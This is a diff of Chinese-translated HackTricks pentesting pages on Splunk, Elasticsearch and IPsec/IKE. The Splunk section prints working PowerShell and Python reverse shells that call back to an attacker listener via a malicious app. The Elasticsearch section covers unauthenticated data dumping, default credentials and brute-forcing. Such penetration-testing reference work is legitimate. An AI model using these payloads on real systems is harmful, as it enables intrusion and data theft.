登录到Splunk后我们可以**浏览数据**,运行**报告**,创建**仪表板**从Splunkbase库中**安装应用程序**,以及安装自定义应用程序。\
您还可以运行代码Splunk有多种**运行代码**的方式如服务器端Django应用程序REST端点脚本输入和警报脚本。在Splunk服务器上获得远程代码执行的常见方法是通过脚本输入。
登录 Splunk 后,我们可以 **浏览数据**、运行 **报告**、创建 **仪表板**、从 Splunkbase 库 **安装应用程序**,并安装自定义应用程序。\
您还可以运行代码Splunk 有多种 **运行代码** 的方式,例如服务器端 Django 应用程序、REST 端点、脚本输入和警报脚本。在 Splunk 服务器上获得远程代码执行的常见方法是通过使用脚本输入。
此外,由于Splunk可以安装在Windows或Linux主机上可以创建脚本输入来运行Bash、PowerShell或批处理脚本。
此外,由于 Splunk 可以安装在 Windows 或 Linux 主机上,可以创建脚本输入来运行 Bash、PowerShell 或 Batch 脚本。
### Shodan
* `Splunk构建`
* `Splunk build`
## RCE
### 创建自定义应用程序
自定义应用程序可以运行**Python批处理Bash或PowerShell脚本**。\
请注意,**Splunk已安装Python**,因此即使在**Windows**系统中您也可以运行Python代码。
自定义应用程序可以运行 **Python、Batch、Bash 或 PowerShell 脚本**。\
请注意,**Splunk 自带 Python**,因此即使在 **Windows** 系统中,您也能够运行 Python 代码。
您可以使用[**此**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk软件包来协助我们。此存储库中的**`bin`**目录有[Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py)和[PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1)的示例。让我们逐步进行
您可以使用 [**这个**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk 包来帮助我们。该 repo 中的 **`bin`** 目录有 [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1) 的示例。让我们一步一步来完成这个过程
要实现这一点我们首先需要使用以下目录结构创建自定义Splunk应用程序
为此,我们首先需要使用以下目录结构创建一个自定义 Splunk 应用程序:
```shell-session
tree splunk_shell/
@ -66,11 +67,11 @@ splunk_shell/
├── bin
└── default
```
**`bin`**目录将包含我们打算运行的任何脚本(在本例中是一个**PowerShell**反向shell默认目录将有我们的`inputs.conf`文件。我们的反向shell将是一个**PowerShell一行命令**
**`bin`** 目录将包含我们打算运行的任何 **脚本**(在这种情况下,是一个 **PowerShell** 反向 shell默认目录将有我们的 `inputs.conf` 文件。我们的反向 shell 将是一个 **PowerShell 一行代码**
```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(
```
[inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) 文件告诉 Splunk **要运行哪个脚本** 以及任何其他条件。在这里,我们将应用设置为启用,并告诉 Splunk 每 10 秒运行一次脚本。间隔始终以秒为单位,只有在存在此设置时,输入(脚本)才会运行。
The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) 文件告诉 Splunk **要运行哪个脚本** 以及其他条件。在这里,我们将应用程序设置为启用,并告诉 Splunk 每 10 秒运行一次脚本。间隔始终以秒为单位,输入(脚本)仅在此设置存在时才会运行。
```shell-session
cat inputs.conf
@ -84,23 +85,23 @@ disabled = 0
sourcetype = shell
interval = 10
```
我们需要`.bat`文件在部署应用程序时运行并执行PowerShell一行命令
我们需要一个 `.bat` 文件,当应用程序部署时运行并执行 PowerShell 一行代码
下一步是选择`从文件安装应用程序`并上传应用程序。
下一步是选择 `Install app from file` 并上传应用程序。
<figure><img src="../.gitbook/assets/image (668).png" alt=""><figcaption></figcaption></figure>
在上传恶意自定义应用程序之前让我们使用Netcat或[socat](https://linux.die.net/man/1/socat)启动一个监听器。
在上传恶意自定义应用程序之前,让我们使用 Netcat [socat](https://linux.die.net/man/1/socat) 启动一个监听器。
```shell-session
sudo nc -lnvp 443
listening on [any] 443 ...
```
`上传应用程序`页面点击浏览选择我们之前创建的tarball然后点击`上传`。一旦我们上传应用程序,应用程序的状态将自动切换为`已启用`并且我们将收到一个反向shell
`Upload app` 页面,点击浏览,选择我们之前创建的 tarball然后点击 `Upload`。**一旦我们上传了应用程序**,应用程序的状态将自动切换为 `Enabled`,这时会收到一个 **反向 shell**
#### Linux
如果我们在处理Linux主机我们需要在创建tarball并上传自定义恶意应用程序之前编辑`rev.py` Python脚本。其余流程将保持不变我们将在Netcat监听器上收到一个反向shell连接然后就可以开始操作了
如果我们处理的是 **Linux 主机**,我们需要在创建 tarball 和上传自定义恶意应用程序之前 **编辑 `rev.py` Python 脚本**。其余的过程将是相同的,我们将在 Netcat 监听器上获得反向 shell 连接,然后开始进行
```python
import sys,socket,os,pty
@ -111,28 +112,29 @@ s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```
### 远程代码执行 & 提权
### RCE & Privilege Escalation
在以下页面中,您可以找到关于如何滥用此服务以提升权限并获取持久性的解释:
在以下页面中,您可以找到有关如何滥用此服务以提升权限并获得持久性的解释:
{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
[splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
{% endcontent-ref %}
## 参考资料
## References
* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中被广告**或**下载 HackTricks 的 PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享您的黑客技巧**。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

102
network-services-pentesting/9200-pentesting-elasticsearch.md
View file

@ -1,30 +1,31 @@
# 9200 - 渗透测试 Elasticsearch
# 9200 - Pentesting Elasticsearch
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## 基本信息
Elasticsearch 是一款用于**各种类型数据**的**分布式**、**开源**搜索和分析引擎。以其**速度**、**可扩展性**和**简单的 REST API** 而闻名。它是基于 Apache Lucene 构建的,由 Elasticsearch N.V.(现在称为 Elastic于 2010 年首次发布。Elasticsearch 是 Elastic Stack 的核心组件,这是一套用于数据摄入、丰富、存储、分析和可视化的开源工具集。这个堆栈通常被称为 ELK Stack还包括 Logstash 和 Kibana现在还有称为 Beats 的轻量级数据传输代理。
Elasticsearch 是一**分布式**、**开源** 的搜索和分析引擎,适用于 **所有类型的数据**。它以 **速度**、**可扩展性** 和 **简单的 REST API** 而闻名。基于 Apache Lucene它于 2010 年首次由 Elasticsearch N.V.(现在称为 Elastic发布。Elasticsearch 是 Elastic Stack 的核心组件,这是一个用于数据摄取、丰富、存储、分析和可视化的开源工具集。这个堆栈通常被称为 ELK Stack还包括 Logstash 和 Kibana现在还有称为 Beats 的轻量级数据传输代理。
### 什么是 Elasticsearch 索引?
Elasticsearch **索引**是存储为 **JSON** 的**相关文档**集合。每个文档由**键**及其对应的**值**(字符串、数字、布尔值、日期、数组、地理位置等)组成。
Elasticsearch **索引** 是一组 **相关文档**,以 **JSON** 格式存储。每个文档由 **键** 和相应的 **值**(字符串、数字、布尔值、日期、数组、地理位置等)组成。
Elasticsearch 使用一种高效的数据结构称为**倒排索引**来实现快速全文搜索。该索引列出了文档中的每个唯一单词,并标识每个单词出现在哪些文档中
Elasticsearch 使用一种称为 **倒排索引** 的高效数据结构来促进快速的全文搜索。该索引列出了文档中的每个唯一单词,并识别每个单词出现的文档
在索引过程中Elasticsearch 存储文档并构建倒排索引,从而实现几乎实时的搜索。**索引 API** 用于在特定索引中添加或更新 JSON 文档。
在索引过程中Elasticsearch 存储文档并构建倒排索引,从而实现近实时搜索。**索引 API** 用于在特定索引中添加或更新 JSON 文档。
**默认端口**9200/tcp
@ -32,27 +33,27 @@ Elasticsearch 使用一种高效的数据结构称为**倒排索引**来实现
### 横幅
访问 Elasticsearch 的协议是 **HTTP**。当通过 HTTP 访问时,您将找到一些有趣的信息:`http://10.10.10.115:9200/`
用于访问 Elasticsearch 的协议是 **HTTP**。当您通过 HTTP 访问时,您会发现一些有趣的信息:`http://10.10.10.115:9200/`
![](<../.gitbook/assets/image (294).png>)
如果在访问 `/` 时未看到该响应,请查看以下部分。
如果您在访问 `/` 时没有看到该响应,请参见以下部分。
### 认证
**默认情况下Elasticsearch 未启用身份验证**,因此默认情况下,您可以在不使用任何凭据的情况下访问数据库中的所有内容。
**默认情况下Elasticsearch 没有启用认证**,因此默认情况下,您可以在不使用任何凭据的情况下访问数据库中的所有内容。
您可以通过请求验证身份验证是否已禁用:
您可以通过请求来验证认证是否已禁用:
```bash
curl -X GET "ELASTICSEARCH-SERVER:9200/_xpack/security/user"
{"error":{"root_cause":[{"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."}],"type":"exception","reason":"Security must be explicitly enabled when using a [basic] license. Enable security by setting [xpack.security.enabled] to [true] in the elasticsearch.yml file and restart the node."},"status":500}
```
**然而**,如果您发送一个请求到 `/` 并收到以下类似的响应:
**然而**,如果你向 `/` 发送请求并收到如下响应:
```bash
{"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}
```
这意味着身份验证已配置,**您需要有效的凭据**才能从Elasticsearch获取任何信息。然后您可以[**尝试暴力破解**](../generic-methodologies-and-resources/brute-force.md#elasticsearch)它使用HTTP基本身份验证因此可以使用任何适用于BF HTTP基本身份验证的方法)。\
这里有一个**默认用户名列表**_**elastic**超级用户remote\_monitoring\_userbeats\_systemlogstash\_systemkibanakibana\_systemapm\_system_ \_anonymous\_.\_ Elasticsearch的旧版本使用此用户的默认密码为**changeme**。
这意味着身份验证已配置,**您需要有效的凭据**才能从elasticsearch获取任何信息。然后您可以[**尝试暴力破解**](../generic-methodologies-and-resources/brute-force.md#elasticsearch)它使用HTTP基本身份验证因此可以使用任何可以暴力破解HTTP基本身份验证的工具)。\
这里有一个**默认用户名列表**_**elastic**超级用户remote\_monitoring\_userbeats\_systemlogstash\_systemkibanakibana\_systemapm\_system_ \_anonymous\_。_ Elasticsearch的旧版本对该用户的默认密码是**changeme**。
```
curl -X GET http://user:password@IP:9200/
```
@ -69,7 +70,7 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"
```
### Elastic Info
以下是一些端点您可以通过GET访问以获取有关elasticsearch的一些信息
这里有一些你可以通过 **GET** 访问的端点,以 **获取** 有关 elasticsearch 的一些 **信息**
| \_cat | /\_cluster | /\_security |
| ------------------------------- | ----------------------------- | ------------------------- |
@ -98,56 +99,56 @@ curl -X GET "ELASTICSEARCH-SERVER:9200/_security/user/<USERNAME>"
| /\_cat/nodeattrs | | |
| /\_cat/nodes | | |
这些端点是从[**文档中获取的**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html),您可以在那里**找到更多**。\
此外,如果访问`/_cat`,响应将包含实例支持的`/_cat/*`端点。
这些端点是 [**取自文档**](https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html),你可以在这里 **找到更多**。\
此外,如果访问 `/_cat`,响应将包含实例支持的 `/_cat/*` 端点。
`/_security/user`(如果启用了身份验证),您可以看到具有`superuser`角色的用户
`/_security/user`(如果启用了身份验证),你可以看到哪个用户具有 `superuser` 角色
### Indices
您可以通过访问`http://10.10.10.115:9200/_cat/indices?v`来**收集所有索引**
你可以通过访问 `http://10.10.10.115:9200/_cat/indices?v` **收集所有索引**
```
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
green open .kibana 6tjAYZrgQ5CwwR0g6VOoRg 1 0 1 0 4kb 4kb
yellow open quotes ZG2D1IqkQNiNZmi2HRImnQ 5 1 253 0 262.7kb 262.7kb
yellow open bank eSVpNfCfREyYoVigNWcrMw 5 1 1000 0 483.2kb 483.2kb
```
要获取**保存在索引中的数据类型信息**,您可以访问:`http://host:9200/<index>`,例如在这种情况下`http://10.10.10.115:9200/bank`
要获取**有关索引中保存的数据类型的信息**,您可以访问:`http://host:9200/<index>`,例如在这种情况下`http://10.10.10.115:9200/bank`
![](<../.gitbook/assets/image (342).png>)
### 转储索引
如果您想**转储索引的所有内容**可以访问:`http://host:9200/<index>/_search?pretty=true`,如`http://10.10.10.115:9200/bank/_search?pretty=true`
如果您想**转储索引的所有内容**,可以访问:`http://host:9200/<index>/_search?pretty=true`如`http://10.10.10.115:9200/bank/_search?pretty=true`
![](<../.gitbook/assets/image (914).png>)
_花点时间比较银行索引中每个文档条目的内容我们在上一节中看到的该索引的字段。_
_花点时间比较银行索引中每个文档条目的内容以及我们在上一节中看到的该索引的字段。_
因此,此时您可能会注意到**"hits"内有一个名为"total"的字段**,指示在此索引中找到了**1000个文档**,但只检索了10个。这是因为**默认情况下限制为10个文档**。\
但是,现在您知道**此索引包含1000个文档**,您可以指定要在**`size`**参数中转储的条目数来**转储所有这些文档**`http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd\
_注意如果指定更大的数字,所有条目都将被转储,例如,您可以指定`size=9999`,如果有更多条目,那将很奇怪但您应该检查。_
所以,此时您可能会注意到**在“hits”中有一个名为“total”的字段**,它表示**在此索引中找到了1000个文档**,但仅检索了10个。这是因为**默认情况下限制为10个文档**。\
但是,现在您知道**此索引包含1000个文档**,您可以**转储所有文档**,在**`size`**参数中指明要转储的条目数`http://10.10.10.115:9200/quotes/_search?pretty=true&size=1000`asd\
_注意如果您指明更大的数字,所有条目仍然会被转储,例如您可以指明`size=9999`,如果有更多条目会很奇怪但您应该检查。_
### 转储所有
为了转储所有内容,您可以直接转到**之前的相同路径,但不指定任何索引**`http://host:9200/_search?pretty=true`,如`http://10.10.10.115:9200/_search?pretty=true`\
请记住,在这种情况下将应用**默认的10**结果限制。您可以使用`size`参数转储**更多结果**。阅读上一节获取更多信息
为了转储所有内容,您只需访问**与之前相同的路径,但不指明任何索引**`http://host:9200/_search?pretty=true`如`http://10.10.10.115:9200/_search?pretty=true`\
请记住,在这种情况下将应用**默认的10**结果限制。您可以使用`size`参数转储**更多结果**。有关更多信息,请阅读上一节。
### 搜索
如果您正在寻找某些信息,您可以对**所有索引进行原始搜索**,转到`http://host:9200/_search?pretty=true&q=<search_term>`,如`http://10.10.10.115:9200/_search?pretty=true&q=Rockwell`
如果您正在寻找某些信息,可以在所有索引上进行**原始搜索**,访问`http://host:9200/_search?pretty=true&q=<search_term>`如`http://10.10.10.115:9200/_search?pretty=true&q=Rockwell`
![](<../.gitbook/assets/image (335).png>)
如果您只想在**一个索引上搜索**,您可以在**路径**上**指定**它:`http://host:9200/<index>/_search?pretty=true&q=<search_term>`
如果您只想**在一个索引中搜索**,可以在**路径**中**指定**它:`http://host:9200/<index>/_search?pretty=true&q=<search_term>`
_注意,用于搜索内容的q参数**支持正则表达式**_
_注意q参数用于搜索内容**支持正则表达式**_
您还可以使用类似[https://github.com/misalabs/horuz](https://github.com/misalabs/horuz)的工具来模糊搜索elasticsearch服务。
您还可以使用类似[https://github.com/misalabs/horuz](https://github.com/misalabs/horuz)的工具来模糊测试elasticsearch服务。
### 写权限
### 写权限
您可以通过尝试在新索引中创建新文档来检查您的写权限,运行类似以下内容:
您可以通过尝试在新索引中创建新文档来检查您的写权限,运行类似以下内容的命令
```bash
curl -X POST '10.10.10.115:9200/bookindex/books' -H 'Content-Type: application/json' -d'
{
@ -157,13 +158,13 @@ curl -X POST '10.10.10.115:9200/bookindex/books' -H 'Content-Type: application/j
"name" : "how to get a job"
}'
```
该命令将创建一个名为`bookindex`的**新索引**,其中包含一个名为`books`的文档,该文档具有属性"_bookId_"、"_author_"、"_publisher_"和"_name_"
该命令将创建一个名为 `bookindex`**新索引**,其文档类型为 `books`,具有属性 "_bookId_"、"_author_"、"_publisher_" "_name_"
注意**现在列表中出现的新索引**
注意 **新索引现在出现在列表中**
![](<../.gitbook/assets/image (130).png>)
并注意**自动生成的属性**
并注意 **自动创建的属性**
![](<../.gitbook/assets/image (434).png>)
@ -179,16 +180,17 @@ msf > use auxiliary/scanner/elasticsearch/indices_enum
* `port:9200 elasticsearch`
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

184
network-services-pentesting/ipsec-ike-vpn-pentesting.md
View file

@ -1,18 +1,20 @@
# 500/udp - 渗透测试 IPsec/IKE VPN
# 500/udp - Pentesting IPsec/IKE VPN
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注**我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
**Try Hard Security Group**
@ -24,17 +26,17 @@
## 基本信息
**IPsec** 被广泛认可为用于保护网络之间通信LAN 到 LAN以及远程用户到网络网关远程访问的主要技术,是企业 VPN 解决方案的支柱。
**IPsec** 被广泛认为是保护网络之间LAN-to-LAN和远程用户到网络网关远程访问通信的主要技术,是企业 VPN 解决方案的支柱。
两个点之间的**安全关联SA**的建立由 **IKE** 管理,它在 ISAKMP 的框架下运行,这是一个设计用于认证和密钥交换的协议。这个过程分为几个阶段:
**IKE** 管理两个点之间的 **安全关联 (SA)** 的建立,它在 ISAKMP 的框架下运行ISAKMP 是一个用于身份验证和密钥交换的协议。这个过程分为几个阶段:
* **第 1 阶段:** 在两个端点之间创建一个安全通道。通过使用预共享密钥PSK或证书来实现可以使用主模式涉及三对消息或**主动模式**
* **第 1.5 阶段:** 虽然不是强制的,这个阶段称为扩展认证阶段,通过要求用户名和密码来验证试连接的用户的身份。
* **第 2 阶段:** 该阶段致力于协商使用 **ESP****AH** 来保护数据的参数。它允许使用不同于第 1 阶段的算法,以确保**完美前向保密性PFS**,增强安全性。
* **阶段 1** 在两个端点之间创建一个安全通道。这是通过使用预共享密钥 (PSK) 或证书来实现的,采用主模式,该模式涉及三对消息,或 **激进模式**
* **阶段 1.5** 虽然不是强制性的,但这一阶段被称为扩展认证阶段,通过要求用户名和密码来验证试连接的用户的身份。
* **阶段 2** 这一阶段专注于协商用于保护数据的 **ESP****AH** 的参数。它允许使用与阶段 1 中不同的算法,以确保 **完美前向保密 (PFS)**,增强安全性。
**默认端口:** 500/udp
## 使用 nmap **发现**该服务
## **使用 nmap 发现** 服务
```
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
@ -44,13 +46,13 @@ PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
```
## **找有效的转换**
## **找有效的转换**
IPSec配置可能只准备接受一个或几个转换。一个转换是一组值的组合。**每个转换**包含一些属性如DES或3DES作为**加密算法**SHA或MD5作为**完整性算法**,预共享密钥作为**认证类型**Diffie-Hellman 1或2作为密钥**分发算法**以及28800秒作为**生存期**
IPSec 配置可以仅准备接受一个或几个转换。转换是值的组合。**每个转换**包含多个属性,如 DES 或 3DES 作为 **加密算法**SHA 或 MD5 作为 **完整性算法**,预共享密钥作为 **认证类型**Diffie-Hellman 1 或 2 作为密钥 **分发算法**,以及 28800 秒作为 **生命周期**
因此,你首先要做的是**找到一个有效的转换**,这样服务器才会与你通信。为此,你可以使用工具**ike-scan**。默认情况下Ike-scan在主模式下工作并向网关发送一个带有ISAKMP头和一个包含**八个转换**的提议的数据包。
然后,您要做的第一件事是 **找到一个有效的转换**,这样服务器才能与您通信。为此,您可以使用工具 **ike-scan**。默认情况下Ike-scan 在主模式下工作,并向网关发送一个带有 ISAKMP 头和一个包含 **八个转换的单个提案**的数据包。
根据响应,你可以获取有关端点的一些信息:
根据响应,您可以获得有关端点的一些信息:
```
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
@ -61,43 +63,43 @@ VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
```
正如您在前面的回复中所看到的,有一个名为**AUTH**的字段,其值为**PSK**。这意味着 VPN 是使用预共享密钥配置的(这对于渗透测试人员来说非常有利)。
如您在之前的回复中所见,有一个字段叫做 **AUTH**,其值为 **PSK**。这意味着 VPN 是使用预共享密钥配置的(这对渗透测试人员来说非常好)。\
**最后一行的值也非常重要:**
* _0 returned handshake; 0 returned notify:_ 这意味着目标**不是 IPsec 网关**。
* _**1 returned handshake; 0 returned notify:**_ 这意味着**目标已配置为 IPsec 并愿意执行 IKE 协商,并且您提出的一个或多个变换是可接受的**(有效的变换将显示在输出中)。
* _0 returned handshake; 1 returned notify:_ VPN 网关在**没有任何可接受的变换**时会响应通知消息(尽管有些网关不会,这种情况下需要进一步分析并尝试修订提议)。
* _0 returned handshake; 0 returned notify:_ 这意味着目标 **不是 IPsec 网关**
* _**1 returned handshake; 0 returned notify:**_ 这意味着 **目标已配置为 IPsec并愿意进行 IKE 协商,您提议的一个或多个变换是可接受的**(有效的变换将在输出中显示)。
* _0 returned handshake; 1 returned notify:_ VPN 网关在 **没有可接受的变换时** 会以通知消息响应(尽管有些网关不会,在这种情况下应进行进一步分析并尝试修订提案)。
因此,在这种情况下,我们已经有一个有效的变换,但如果您处于第三种情况,则需要**稍微暴力破解以找到有效的变换**
然后,在这种情况下,我们已经有了一个有效的变换,但如果您处于第三种情况,则需要 **稍微暴力破解一下以找到有效的变换**
